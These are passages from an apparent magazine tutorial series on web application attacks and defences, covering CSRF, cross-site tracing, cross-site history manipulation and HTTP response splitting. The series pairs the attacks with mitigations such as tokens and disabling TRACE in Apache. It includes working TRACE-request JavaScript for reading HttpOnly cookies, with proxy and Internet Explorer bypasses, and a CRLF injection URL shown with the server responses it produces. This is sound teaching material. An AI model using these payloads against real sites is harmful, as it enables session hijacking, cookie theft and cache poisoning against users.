The CSRF attack using the HTTP POST method is summarised in Figure 2. Please note that this scenario was used just to explain CSRF clearly, and that no bank is careless enough to let such an attack happen. I reiterate that you should not try any of these steps on any public server.
Figure 2: CSRF attack using HTTP POST
Figure 2: CSRF attack using HTTP POST
Scenario 2
Another CSRF attack scenario exploits the firewall Web management system. This is again based on session cookies. Let’s suppose the firewall Web management application has a function that allows an authenticated user to delete a rule, specified by its positional number, or all the rules of the configuration, if the user enters ‘*’. For example, a valid URL to delete a single rule, number 5, would be:
http://www.example.com/firemange/delete?rule=5
Malicious HTML for the CSRF, using HTTP GET is as follows:
……
……
….
Scenario 3
Routers for private use, like popular DSL routers, come with a preconfigured IP address for the LAN interface (e.g., 192.168.0.1), which most users do not change. Thus, the host-part of the URL is known in most cases. Attackers are familiar with the workings and URLs of most popular routers, and if they can social-engineer the victim into clicking a malicious link, this will (for example) enable the remote Web management on port 8080, allowing it to be administered from any computer on the Internet. The malicious Web page might contain the following HTML:
The attacker can also change the router’s default account name, and could also compromise network printers—so if you have a DSL/home router left at its default settings, change the preconfigured IP and default passwords right now!
Using well-known URLs for Web applications, an attacker can also reset your Web-based account passwords, tamper with your corporate Web-mail, and delete or modify accounts in Web applications. CSRF is a serious vulnerability, and cannot be taken lightly.
The differences between XSS and CSRF
Though CSRF seems similar to Cross-Site Scripting (XSS) at first, both are completely different attack vectors. Where XSS aims at inserting active code in an HTML document to either abuse client-side active scripting holes, or to send privileged information (e.g., authentication/session cookies) to an unknown evil site, CSRF aims to perform unwanted actions on a site where the victim has some prior relationship and authority. Moreover, where XSS sought to steal your online trading cookies so an attacker could manipulate a victim’s account, CSRF seeks to use the victims’ cookies to force them to execute a trade without their knowledge or consent. While XSS attacks exploits the trust that a user has on the website, CSRF attacks exploit the trust that the website has in its user.
Types of CSRF attacks
CSRF attacks can be divided into two major categories—reflected and stored/local.
Reflected CSRF attacks
In a reflected CSRF attack, the attacker uses a system outside the application to expose the victim to the exploit link or content. This can be done using a blog, an email message, an instant message, a message-board posting, or even a flyer posted in a public place with a URL that a victim types in.
Reflected CSRF attacks will frequently fail, as users may not be currently logged into the target system when the exploits are tried. The trail from a reflected CSRF attack, however, may be under the attacker’s control, and could be deleted once the exploit is completed. The three attack scenarios we looked at earlier are examples of reflected CSRF attacks.
Local/stored CSRF attacks
A stored/local CSRF attack is one where the attacker can use the application itself to provide the victim the exploit link, or other content which directs the victim’s browser to perform attacker-controlled actions in the application. Stored CSRF vulnerabilities are more likely to succeed, since the user who receives the exploit content is almost certainly currently authenticated to perform actions.
Stored CSRF attacks also have a more obvious trail, which may lead back to the attacker, since the origin of the malicious HTTP request is hosted in the attacked website. Examples include bulletin boards and social sites where users are allowed to post images with foreign URL sources. These are harder to find and destroy.
Why CSRF works
To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications:
Implicit authentication
Explicit authentication
Implicit authentication by Web browsers
Figure 3: Typical HTTP authentication
Figure 3: Typical HTTP authentication
Figure 4: Typical cookie authentication
Figure 4: Typical cookie authentication
Figure 5: Typical IP-based authentication
Figure 5: Typical IP-based authentication
Implicit authentication by Web browsers occurs when the browser automatically includes authentication information in HTTP requests; in other words, the Web browser itself is responsible for tracking the authenticated state. Widely used implicit authentication mechanisms in the browser include:
HTTP authentication: This enables the Web server to request authentication credentials from the browser in order to restrict access to certain Web pages. In all the three methods (basic, digest and NTLM), the initial authentication process undergoes the same basic steps. Figure 3 shows a simplified version of the authentication process. If the client requests further restricted resources that lie in the same authentication realm, the browser includes the credentials automatically in the request.
Cookies: Web browser cookie technology provides persistent data storage on the client side, which is often used by today’s Web applications to store authentication tokens. After a successful login procedure, the server sends a cookie to the client. Every subsequent HTTP request that contains this cookie is automatically regarded as authenticated. The typical cookie authentication process is shown in Figure 4.
Client-side SSL authentication: The Secure Socket Layer (SSL), and its successor, the Transport Layer Security (TLS) protocol, enable cryptographically authenticated communication between the Web browser and the Web server. To authenticate, X.509 certificates and digital signature schemes are used.
What all these schemes have in common is that after a successful initial authentication, tokens are sent automatically in further requests, without asking the user for permission—this is what makes Web applications that use these authentication techniques, vulnerable to CSRF attacks.
Implicit authentication by IP address
This special case of implicit authentication is often found on intranets. Here, the authentication is based on certain IP (or MAC) addresses from which requests are made to the application. Shown in Figure 5 is a typical IP-based authentication, in which only users within the intranet are allowed to access the intranet server, and requests from all other IP addresses are denied access.
Explicit authentication is safer
In this type of authentication, the Web application (or the Web server) is itself responsible for tracking the authenticated state of the user. This is
generally done in two ways:
URL rewriting, in which the session tokens are included in the URL for every request sent to the server; the URL is generated by the Web application/Web server, and does not require the browser to pass authentication tokens along with the request.
Form-based session tokens, in which hyperlinks are replaced with HTML forms that contain session identifiers in hidden form fields.
Though explicit authentication is immune to CSRF, it has other problems, which we will discuss in a while.
The main reason that CSRF works is that Web applications using implicit authentication mechanisms do not verify that a state-changing request was created within the Web application. Because of the implicit authentication of the user, the attacker can easily control the user’s session.
Another underlying factor that enables CSRF attacks is the application’s use of predictable URL/form actions in a repeatable way.
Some myths about CSRF
Myth: CSRF is just a special case of XSS
Fact: XSRF is a separate vulnerability from XSS, with a different solution. XSS protection won’t stop XSRF attacks, though it is also important to guard against XSS on a priority basis.
Myth: Applications aren’t vulnerable to CSRF if they use multi‐page forms to perform actions.
Fact: While multi‐page forms certainly make exploitation harder, attackers usually can exploit them. Attackers frequently use multiple IFRAMEs when building multi‐page form CSRF exploits.
Myth: CSRF is solvable by forcing all sensitive requests over POST while denying GETs.
Fact: While POSTs can be more difficult to exploit, they certainly are exploitable, as shown in Scenario 1. Using POST rather than GET can provide a defence only against local CSRF attacks; POST requests can still be created with hidden IFRAMEs on foreign Web pages. Forms can mislead users about what they are sending, and where, and scripting can lead to automatic submission. JavaScript is fully capable of sending POST requests via form submissions.
Myth: CSRF can be prevented by filtering based on the referrer header.
Fact: This option is very unreliable, since attackers can easily block the sending of the referrer header, through the use of certain browser and Flash exploits. Some browsers also omit the referrer header when they are being used over SSL. Moreover, many firewalls and anti-spyware software often drop referrers, in their default mode, without letting users know. But, using referrers can be viewed as another incremental roadblock.
Myth: Browser enforcement of Same Origin Policy (SOP) prevents CSRF.
Fact: Browsers that implement SOP will prevent scripts from accessing the DOM of a page originating from another domain, or accessing cookies that originate from other domains. However, they do not prevent scripts from sending requests to other domains. Furthermore, when a script sends a request to another domain (or when an IMG tag’s SRC attribute is set to another domain), the browser will execute the request, and will also send any cookies it has that are valid for the domain, along with the request. (See box on SOP).
Advanced uses of CSRF
The following advanced techniques that use CSRF attacks have been observed in recent years.
Bypassing CSRF protections with click-jacking: This recently-evolved technique can be used to bypass CSRF protection and submit POST method-based forms with attacker controlled data, using click-jacking. See the box on click-jacking for more information.
The best example of this attack is exploiting e-mail update services. Such services are quite common in Web applications. In this, the attacker manages to force victims to update their e-mail IDs with that of the attacker, so that the attacker can then compromise the victims’ account by performing a password reset. This attack can occur even if the Web application contains tokens for CSRF protection. A cool and elaborate description of this is available at http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html. Do check it out for more information.
Using XSS to bypass CSRF protection: This technique applies to websites that have an application that guards against CSRF, yet have pages that are vulnerable to XSS attacks. It’s a big misconception that guarding against CSRF will also secure the application against XSS. Using XSS, attackers can bypass the CSRF protection, and can automate any action that can be done on the application, without problems. Attackers simply read the site-generated token from the response, and include that token with a forged request. One such example of this is attackers exploiting an XSS vulnerability of a website to add a fake user with administrator privileges, when the site is secured against CSRF attacks. A good discussion on this type of attack (with code) is available in the Further Reading section. Please do spend some time on it. It was by using an XSS vulnerability that the Samy worm bypassed MySpace’s CSRF protection in 2005, infecting over one million accounts within just 20 hours of its release.
Attacking intranets: Exploiting intranets involves CSRF attacks through IP-based implicit authentication schemes. Most intranet Web servers are vulnerable to this type of attack. The fact that many intranet servers continue to use default passwords, leave hosts unpatched, and blindly rely on perimeter firewalls to block external attacks has given rise to intranet vulnerabilities to CSRF and malicious JavaScript. This malicious JavaScript, once behind the firewall, can attack the intranet; since it is independent of the operating system and the Web browser, it is hard to defend against.
One such example is port scanning of the intranet Web server, using JavaScript and CSRF. The JavaScript constructs a local (intranet) URL that contains the IP address and the port to be scanned. The script then includes an element in the Web page (such as an image, IFRAME or remote script) that is addressed by the URL. Also, using JavaScript time-out functions, and event handlers like OnLoad and OnError, the script can decide whether the host exists and whether the given port is open. If a time-out occurs, the host probably does not exist. An OnLoad event indicates that the host probably runs a Web server, and an OnError event indicates that the host exists, but the port is closed. The typical attack scenario is shown in Figure 6. In this scenario, the attacker forces/convinces the intranet user to visit a malicious page on the attacker’s server, which contains the following HTML in a hidden IFRAME:
As soon as the user executes this page, the information about the existence of the Web server is sent to the attacker in the form of errors. Apart from this, the attacker can fingerprint applications/routers/network devices, and also might locate HTTPS or development servers by varying the ports.
Guarding against CSRF attacks
Following a few guidelines for both users and developers can help to curb CSRF attacks a lot.
For users
Log out of the important Web application when you have completed your work/transactions. Do not open any non-trusted site in the same browser while logged in to the important site. If you need to do this for some reason, use a separate browser for the untrusted site(s).
Use Mozilla Firefox with the NoScript add-on, which allows JavaScript, Java and other executable content to run only from trusted domains of your choice. It is one of the best defences available for protection against XSS, CSRF and click-jacking attacks. Also consider using the CsFire add-ons, which autonomously protect you against CSRF and other dangerous or malicious cross-domain requests. CsFire will remove authentication information (cookies and authentication headers).
Use multiple browsers and segregate your browsing into trusted/sensitive sites/applications and untrusted/less important sites/applications. For example, use Firefox, with the NoScript and Adblock Plus (ABP) add-ons installed, to browse trusted/sensitive sites/applications. In NoScript, white-list trusted sites so JavaScript from those sites will work. Set up ABP to block known malicious sites; use the auto-configuration URL at the end of http://adblockplus.org/blog/blocking-malicious-sites-with-adblock-plus to add the filter list to ABP. For other (untrusted) sites, install another browser like Google Chrome, Chromium or Opera. If you’re not certain about off-site links encountered in trusted sites (e.g., someone mails you a link to your Gmail, which you’re viewing in Firefox), then instead of visiting it in Firefox, drag the link from the page in Firefox to Chrome/Chromium’s tab bar (or copy/paste it), to have it open in a new tab in Chromium. Since only the link URL is transferred to the other browser, and any implicit-authentication tokens remain in Firefox, this is a safer practice.
Regularly deleting long-duration cookies (those which are set to expire after an inordinately long time) will also help mitigate the threat.
If possible, don’t store user-names and passwords in the browser’s password manager (for example, see http://lwn.net/Articles/211875/ ).
For developers
The best defence against CSRF attacks is unpredictable tokens, a piece of data that the server can use to validate the request, and which an attacker can’t guess. For example, an important request could contain a digest of the user’s session credential, which is different for every user. And, for a little extra security, add a timestamp to the token, to limit the window of opportunity, as shown in the POST body below:
POST http://fictitiousbank/transfer.cgi HTTP/1.1
Host: fictitiousbank
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906
Firefox/3.6.2
Cookie: PHPSESSIONID=7757ADD8766d455NFJJ23875JBJKBFR from=35367021&to48412334&amount=5000&date=05072010&token=40E03EF45T443W20K4IC567HY4334DD44×tamp=1184001456
The tokens used should also be cryptographically very strong.
Limit the time for which the user’s credentials are valid. By enforcing inactivity time-outs, you reduce chances of CSRF attacks.
Password re-verification should be given priority over single-sign on. In this method, the users must type in their passwords again when accessing particularly critical functions.
Switching over to URL rewriting is not recommended since, when URLs contain session tokens, the tokens could be leaked via proxy-logs/referrers. Moreover, they are also not very helpful against local/stored attacks, since all URLs produced by the application contain the token.
Do not rely (solely) on referrer checking, as techniques exist to selectively create HTTP requests without referrers.
For protection against local/stored attacks, you should mirror all foreign content, and don’t allow arbitrary URLs in your Web application. Moreover, local attacks can be mitigated if you only serve images from your own servers (like for social sites and forums) and also don’t allow users to store arbitrary data on your servers.
When building defences against CSRF, you must eliminate XSS vulnerabilities.
Throw as many roadblocks at the attacker as possible, including customised error messages, checks on HTTP referrer headers and Web application firewalls.
Use CAPTCHAs, especially for important transactions, to check whether there’s a human being at the other end, and not an automated attack.
Harden the intranet websites, apply security patches and updates, and change default passwords.
Tools of the security trade
There are Web scanners available, both commercial and FOSS, to test websites for CSRF, but it’s very rare that they find CSRF code, given the complexity of CSRF attacks. However, there is some FOSS available to make security work easy:
OWASP CSRF tester: This is basically a JavaEE filter that implements the synchroniser token pattern to mitigate the risk of CSRF attacks. Its documentation can be found at http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project. A PHP implementation of this CSRF guard is available at www.owasp.org/index.php/PHP_CSRF_Guard and a .NET implementation at www.owasp.org/index.php/.Net_CSRF_Guard.
RequestRodeo is an HTTP proxy written in Python, using the Twisted framework, OpenSSL and SQLite. It protects its user against CSRF. It can be found at http://savannah.nongnu.org/projects/requestrodeo/.
For more detailed information on CSRF, and more defences against it, don’t forget to visit the resources below. We will deal with other dangerous attacks on Web applications and Apache in the next article. Always remember: know hacking, but no hacking.
Further reading
http://packetstormsecurity.org/papers/attack/Using_XSS_to_bypass_CSRF_protection.pdf
Visit http://www.secologic.org/
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
http://www.whitehatsec.com/ contains good information both on XSS and CSRF and other attacks.
The author is a FOSS enthusiast, and loves to troubleshoot in the information security domain, while exploring new exploits and system vulnerabilities. You can send your queries and constructive feedback on this article to abajpai75 AT yahoo DOT com.
Web browsers use a security model called the same-origin policy (SOP) to enforce some access restrictions on Web applications. The SOP identifies each website using its origin, which is a unique combination of protocol, domain and port, and creates a context for each origin. Two resources are considered to be of the same origin only if all these values are exactly the same.
Click-jacking is an attack involving embedded objects on a maliciously crafted Web page. Using framed content, or that from Flash, Silverlight, or Java, the attacker places a transparent or invisible click button beneath the mouse, so that whenever the user clicks on something they see on the page, the user is also clicking to an unseen website that may contain malicious code. The attack can also take advantage of dynamic HTML and CSS (Cascading Style Sheets) code for further disguise. The difference between CSRF and click-jacking is that in CSRF, the victim’s browser performs the attack (loading the state-changing URL directly) without the victim clicking to launch it, while in click-jacking, the user actually interacts with something, but the action is ‘hijacked’ by placing a layer between the user and the page element that launches a legitimate action.
iv.
we discussed about XSS attacks; in solutions to these, we talked about using HttpOnly cookie mechanisms. HttpOnly is a session protection mechanism which specifies that the session identifier should not be accessed from the application DOM. In that case, the attacker cannot hijack the session using malicious scripts, because document.cookie does not return anything useful. HttpOnly works with almost all modern browsers. It is implemented simply as:
Set-Cookie: PHPSESSIONID=[token]; HttpOnly
It was by far one of the best ways to stop XSS attacks from fetching a victim’s cookies—until it was found that the web server HTTP TRACE method (more about it below) can be used to bypass HttpOnly security mechanisms. If an attacker forces the victim’s browser, using XSS, to issue a TRACE request to the web server, and this browser has a cookie for that domain, the cookie will be automatically included in the request headers, and will therefore be echoed back in the resulting response. At that point, the cookie string will be accessible by JavaScript, and it will be finally possible to send it to a third party even when the cookie is tagged as HttpOnly. Hence, XST is nothing else but doing an XSS attack using TRACE.
HTTP TRACE and XST
The HTTP TRACE request is a method designed for debugging problems such as network connection errors between servers. It is defined with other well-known methods like GET, PUT, DELETE, etc. When a client sends a TRACE request to a compliant server, the server responds by echoing back the header sent by the client. An attacker can exploit this to circumvent HTTPOnly cookies by injecting code that sends an asynchronous XMLHttpRequest with the TRACE method, and receiving the HTTPOnly cookie in the message echoed back by the server. Let’s have a look at a simple attack scenario to understand it clearly:
Attack scenario
Let’s continue with the example that we used (for reflected XSS) in part 2 of this series. When an attacker finds an XSS vulnerability in a web application, where the application’s script displays the criteria used in a website query as part of the URL for the results of the query. For example, the URL in the browser for a page showing the results for a search for “products” might be http://www.example.com/search.php?query=products. Now, take the following cases:
1. When HttpOnly cookies are not deployed, and TRACE is enabled. Here, as already discussed in part 2, the attacker might post a modified link, such as this:
http://www.example.com/search.php?query=alert(document.cookie)
This harmless example will cause the victim’s browser to pop up an alert box, showing their current set of cookies.
2. When HttpOnly cookies are deployed but TRACE is still enabled. Here, it is clear that the above method will not work for the attacker, because HttpOnly will not return these cookies to the JavaScript document.cookie. So here, the attacker, knowing that TRACE is enabled on the web server (they can verify it by methods given in the security section below), might use something like the following code (call it mal.js):
var x = new ActiveXObject(“Microsoft.XMLHTTP”);
// var x = new XMLHttpRequest();
x.open(“TRACE”, “http://example.com”,false);
x.send();
//x.send(“”);
cookie=x.responseText;
alert(cookie);
(The code above is used for Internet Explorer browsers; modifications required for Mozilla are commented out). This will alert the victim with their cookies even after HttpOnly is used. Remember, here the attacker can shorten such a big malicious code via tiny URL techniques (refer to part 2 of this series). The attacker can also steal here the cookies, and other login credentials. A visualisation of this is shown in Figure 1.
Figure 1: Attack possible with TRACE enabled
Figure 1: Attack possible with TRACE enabled
Figure 2: Attack not possible with TRACE disabled
Figure 2: Attack not possible with TRACE disabled
The particular example above is taken just for educational purposes. I once again stress that neither I nor LFY aim to teach readers how to attack servers. Rather, the attack techniques are meant to give you knowledge that you need to protect your own infrastructure.
What’s going behind the scenes?
The above code, using the ActiveX control XMLHTTP, will send a TRACE request to the target web server. If TRACE is enabled on the web server, it will then echo the information sent within the HTTP request. Now, if the victim’s browser happens to have a cookie from the target web-server, or is logged in to the server using implicit authentication mechanisms, they will then be able to see their cookies.
What if you disable TRACE?
Many security experts suggest that you disable the web server’s TRACE method to begin with, though it provides an effective security measure (see Figure 2). However, if there is a proxy server between the client and the web server, it has been found possible to force the proxy server to respond to the TRACE request, rather than the origin server itself. To do this, the attacker would simply include “Max-Forward: 0” in the HTTP request header. Seeing this, the first proxy server in the chain will respond to the TRACE request, instead of forwarding it to the web server. Hence, the XSS script could be updated to:
var x = new ActiveXObject(“Microsoft.XMLHTTP”);
// var x = new XMLHttpRequest();
x.open(“TRACE”, “http://example.com”,false);
x.setRequestHeader(“Max-Forwards”, “0”);
x.send();
//x.send(“”);
c=x.responseText;
alert(c);
(Again, the base code is for Internet Explorer, modifications for Mozilla are commented out). Microsoft, trying to secure Internet Explorer, removed the support for any method starting with TRACE in the XmlHttp object. However, this security measure was also broken when it was found that instead of using “TRACE”, the attacker can simply use “\r\nTRACE”. Hence, the line in the above script, x.open(“TRACE”, “http://example.com”,false) would become x.open(”\r\nTRACE”,”http://example.com”,false).
Cross-site tracing (XST) is one of the most silently prevalent threats on the Internet today. However, following the security tips below can help you curb it.
Time for Security
1.The first and the foremost security measure is to disable the TRACE request method (unless needed) on your web servers.
2.Moreover, web-server vendors should have TRACE disabled in the web-server’s default “out-of-the-box” configuration.
3.Proxy servers should also be shipped with TRACE disabled in their default configurations.
4.Disable TRACE in your browser’s XmlHttpRequest object too. For this, check the support page of your browser’s vendor.
5.For all Internet Explorer users: if you must continue using Internet Explorer, switch to version 7 or 8, because they seem to have patches for this attack. However, the far better path, which I recommend, is for you to use the latest versions of Mozilla Firefox (>3.2) instead.
How to disable TRACE in Apache?
Disabling TRACE in Apache is quite easy. The only thing one requires is the Apache mod_rewrite module installed, and then, follow these steps:
1.Activate mod_rewrite in httpd.conf by adding this line to it:
LoadModule rewrite_module modules/mod_rewrite.so
2.Add the following lines in httpd.conf to disable TRACE:
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* – [F]
3.Now, restart the Apache web server.
After TRACE has been disabled according to the instructions above, any incoming TRACE requests will be responded to with an HTTP status code of either 403 or 405. You can also verify it by telnetting to your server, as shown below:
server@attacker~$ telnet www.victim.com 80
OPTIONS / HTTP/1.1
Host: www.victim.com
HTTP/1.1 200 OK
Server: Apache-httpd/2.2.1
Date: Tue, 31 Oct 2006 08:00:29 GMT
Connection: close
Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
Content-Length: 0
As we can see in the example, the Allow line provides a list of the HTTP methods that are supported by the web server. In this case, we see that every method is enabled except for the TRACE method.
Let’s now move on to another web application attack: cross-site history manipulation (XSHM)
Cross-site history manipulation (XSHM)
This recently evolved attack works by taking advantage of an individual’s browsing history, seen in Mozilla Firefox, Google Chrome and Internet Explorer. By manipulating the browser history, it is possible to compromise a web browser’s same-origin policy (SOP), and so violate user privacy.
Recall that in part 3 of this series we discussed a bit about SOP, and also that web pages from different origins cannot communicate with each other (‘communicate’ here means that a page from one origin can only send an HTTP request to a page from different origin. However, it cannot read an HTTP response of a page from different origin). Hence, while doing CSRF, an attacker can only submit malicious HTTP requests to a bank website, but he/she cannot read the HTTP response from that site. However, recently it was found that even these limitations for the attacker can be bypassed by compromising SOP, via manipulation of the browser’s history objects. First, let’s look at the design of the browser history object.
Browser history object
Browser history is a global list of pages visited by the user, which the user can cycle through by pressing the Back and Forward buttons of the browser. Some of its features are:
1.If the same URL is opened multiple times, only one entry will be made into the history list.
2.If a user opens page B, which is then automatically redirected to page A (by the web server), then only the URL of page A will be entered into the history list.
3.It is possible to open a URL without adding it to the history list. By using location.replace, we can open different URLs, one after the other, replacing the current history position.
4.SOP only prevents JavaScript from accessing URLs in the history; it does not prevent access to history.length (the number of elements in the global history list). Also, it is possible to load a specific URL from the history list, using history.go(URL).
The following are XSHM attack vectors which use manipulation of the browser’s history object:
Cross-site condition leakage
Cross-site user tracking
Cross-site URL/parameters enumeration
We will focus on these one by one.
Cross-site condition leakage
Suppose a site contains the following logic:
Page A: If(Condition)
Redirect(Page B)
Here, an attacker can execute a CSRF attack to get an indication about the value of Condition (whether it’s TRUE or FALSE) as feedback. Such an attack is executed from the attacker’s site, using the following attack process:
1.Attacker creates an IFRAME whose src is Page B.
2.The code saves the current value of history.length in a variable.
3.The code then changes the src of the IFRAME to Page A.
4.Upon comparing the saved value with the present value of history.length, if it is the same, then Condition is TRUE.
The above algorithm is based on the browser’s history object displaying the behaviour listed as the second property/feature above. Consequently, history.length will remain the same after opening Page A, and this indicates that Condition is TRUE. If Condition was FALSE, then Page A being added to the browser’s history would increase its length by one. Since an attacker can open both URLs from his page inside an IFRAME, and history.length is accessible from a page on the attacker’s site, this is a case of cross-site condition leakage—and hence, a violation of SOP. After getting an indication of the value of Condition, the attacker can now plan a two-way CSRF attack (a two-way CSRF attach means that the attacker will be getting a response for the CSRF attack). Let’s have a look at a simple attack scenario.
Attack scenario
Suppose a bank application allows transfer of money from one account to another. Now, the site might use the following code for this:
If (Money_Transfer())
Redirect(”Transaction_done.php”);
The above code executes the money-transfer transaction, and if the transaction succeeds, then the user’s browser is redirected to the Transaction_done page. In this case, an attacker can not only execute a CSRF attack and transfer money, but can also get feedback on whether this operation was successfully completed, using the following attack process:
1.Attacker creates an IFRAME with src=’ Transaction_done.php’ with history.length element in it.
2.This alerts the attacker with the current value of victim’s history.length.
3.Now, changes the src of IFRAME to ‘Money_transfer.php’.
4.If the value of history.length remains the same – then the operation was successfully completed.
However, this was a simple attack scenario; besides this, the attacker can also detect the user’s authentication state, and can also access valuable intranet resources, which otherwise cannot be accessed publicly.
Cross-site user tracking
While using an IFRAME, an attacker has limitations: she cannot know what the victim is doing in the IFRAME, and also, by design, an IFRAME cannot communicate with its parent page. But, using XSHM, an attacker can bypass these limitations too—and in some cases, track user activities inside an IFRAME. To track the victim’s activities in a page inside an IFRAME, an attacker builds a list of URLs that a parent page contains, or can submit. Now, whenever the victim clicks a link in the IFRAME, his history.length will remain the same. The URL of this link must always remain on top of the history list; here, the attacker can use location.replace to probe different URLs from the list, without inserting them to the top of the history list. A typical attack process is as follows:
1.The attacker creates an IFRAME with its src as the victim’s site, with a history.length element in it.
2.On each load event of the IFRAME, the attacker remembers the current value of the victim’s history.length, and then changes the src of the IFRAME to a URL which the parent page can access.
3.Performing the last two actions on all URLs the parent page can access, until the value of history.length ceases to increase lets an attacker know what link a user clicked, and when it was clicked.
An example of this is a phishing attack in which the attacker opens a legitimate site from an IFRAME. As the victim clicks a link to log in, the attacker is intimated about this, and opens a fake login page instead.
Cross-site URL/parameters manipulation
This is another attack vector of XSHM, through which the attacker can also enumerate previously browsed URLs. The attack process for this is quite simple:
1.The attacker builds an array of URLs to check (let’s call it URL[]).
2.The attacker then runs history.go(URL[x]) for each URL in the list.
3.If a document.unload occurs, the event assures the attacker that URL[x] was visited in the current session.
The only limitation with the above process is that the attacker must set the URL[] array, containing all the URLs for which the victim’s visit is to be assured, prior to the attack.
Cross-site history manipulation (XSHM) is a new attack vector, by which the Same Origin Policy can be compromised, and the user’s privacy can be violated. XSHM enhances CSRF by making it a two-way attack. However, the following security tips can help curb it.
Time for security
If your application uses conditional redirects, it might be vulnerable to XSHM. However, for the following code, there is no potential risk:
if (url != “”)
Response.Redirect(url);
This is because the condition if(url != “”) is specific, and cannot produce TRUE or FALSE.
1.For successful prevention of cross-site history manipulation, both the URL of the origin page from which redirection is executed, and a redirected target page, should contain a random token, as shown below:
If ( !isAuthenticated)
Redirect(„Login.aspx?r=‟ + Random())
2.To prevent URL/parameters enumeration, all site URLs should contain random tokens placed inside the URL.
For gaining further information on these attacks, don’t forget to visit the resources below. We will deal with other dangerous attacks on web applications and Apache in the next article. Always remember: Know hacking, but no hacking.
vi.
In the last four articles in this series, we have discussed SQL injection, XSS, CSRF, XST and XSHM attacks, and security solutions. This time, we focus on attacks exploiting the HTTP message architecture in the client-proxy-server system.
Intercepting HTTP messages has always been high on the priority list of attackers. Their focus is on what’s going on between the server and the client. The presence of intermediaries such as cache servers, firewalls, or reverse proxy servers makes for potentially highly non-secure communication. Attacks which deal with interception of HTTP messages are:
HTTP response splitting.
HTTP request smuggling.
HTTP request splitting.
HTTP response smuggling.
Let’s look at these one by one.
HTTP response splitting attack
Also known as a CRLF injection, this attack causes a vulnerable web server to respond to a maliciously crafted request by sending an HTTP response stream which is interpreted as two separate responses instead of a single one. This is possible when user-controlled input is used, without validation, as part of the response headers. An attacker can have the victim interpret the injected header as being a response to a second, dummy, request, thereby causing the crafted contents to be displayed, and possibly cached. To achieve HTTP response splitting on a vulnerable web server, the attacker:
1.Identifies user-controllable input that causes arbitrary HTTP header injection.
2.Crafts a malicious input consisting of data to terminate the original response and start a second response with headers controlled by the attacker.
3.Causes the victim to send two requests to the server. The first request consists of maliciously crafted input to be used as part of HTTP response headers, and the second is a dummy request so that the victim interprets the split response as belonging to the second request.
This attack is generally carried out in web applications by injecting malicious or unexpected characters in user input which is used for a 3xx Redirect, in the Location or Set−Cookie header. It is mainly possible due to lack of validation of user input, for characters such as CR (Carriage Return= %0d = \r) and LF (Line Feed= %0a = \n). In such web applications, a code such as “\r\n” is injected in one of its many encoded forms.
To understand how it works, let’s first understand a normal response to a 302 redirection. This is a ‘normal redirect’ script in PHP:
Requests to this page such as http://test.example.com/~arpit/redirect.php?page=http://www.example.com would redirect the user’s browser to http://www.example.com. Let’s look at the HTTP headers during this session.
User to server—sample GET request:
GET /~arpit/redirect.php?page=http://www.example.com HTTP/1.1\r\n
Host: test.example.com\r\n
User−Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.9)
Gecko/2008052960 Firefox/3.6.2\r\n
…..
Accept−Language: en−us,en;q=0.5\r\n
Accept−Charset: ISO−8859−1,utf−8;q=0.7,*;q=0.7\r\n
Keep−Alive: 300\r\n
Connection: keep−alive\r\n
\r\n
Server to user—302 response:
HTTP/1.1 302 Found\r\n
Date: Tue, 12 Apr 2005 21:00:28 GMT\r\n
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0a\r\n
Location: http://www.example.com\r\n [User input in headers]
……
Content−Type: text/html\r\n
Connection: Close\r\n
User to server—GET request for redirected page:
GET / HTTP/1.1\r\n
Host: www.example.com\r\n
User−Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.9)
Gecko/2008052960 Firefox/3.6.2\r\n
…….
Accept−Language: en−us,en;q=0.5\r\n
Accept−Charset: ISO−8859−1,utf−8;q=0.7,*;q=0.7\r\n
Keep−Alive: 300\r\n
Connection: keep−alive\r\n
Figure 1: Normal client-server communication for 302 redirect
Figure 1: Normal client-server communication for 302 redirect
Now, the server will respond with a normal 200 OK response, and the user will see the web page loaded from www.example.com. The ‘usual’ HTTP headers above can also be visualised as in Figure 1.
Now, an attacker might use the %0d%0a characters to poison the header, by injecting something like:
http://test.example.com/~arpit/redirect.php?page=%0d%0aContent−Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent−Type: text/html%0d%0aContent-
Length:%206%0d%0a%0d%0a%3Chtml%3EHACKED%3C/html%3E.
That is, the injected code is:
\r\n
Content−Type: text/html\r\n
HTTP/1.1 200 OK\r\n
Content−Type: text/html\r\n
Content-Length: 6\r\n
\r\n
HACKED
This malicious link (shortened via the tiny URL technique), if followed/clicked by the victim, sends the following request to the server:
GET /~arpit/redirect.php?page=%0d%0aContent−Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent−Type: text/html%0d%0aContent-
Length:%206%0d%0a%0d%0a%3Chtml%3EHACKED%3C/font%3E%3C/html%3E.
Host: test.example.com
User−Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en−US; rv:1.9)
Gecko/2008052960 Firefox/3.6.2
……
Accept−Language: en−us,en;q=0.5
Accept−Charset: ISO−8859−1,utf−8;q=0.7,*;q=0.7
Keep−Alive: 300
Connection: keep−alive
The server would respond:
HTTP/1.1 302 Found [First standard 302
response]
Date: Tue, 12 Apr 2005 22:09:07 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0a
Location:
Content−Type: text/html
HTTP/1.1 200 OK [Second New response created by attacker begins]
Content−Type: text/html
Content-Length: 6
HACKED [Arbitrary input by
user is shown as the redirected page]
Content−Type: text/html
Connection: Close
Figure 2 : Response splitting attack process
Figure 2 : Response splitting attack process
As we can see in the exploitation process above, the server runs the normal 302 response, but the arbitrary input in the location header causes it to start a new 200 OK response, which shows our input data to the victim as a normal web server response. Hence, the victim will see a web page with the text HACKED. The overall steps are shown in Figure 2. This example is a simple case of XSS exploitation using an HTTP response-splitting vulnerability. Apart from this, an attacker can also do web cache poisoning, cross-user attacks, and browser cache poisoning.
————————————–BOX (cross user attacks) ———————————
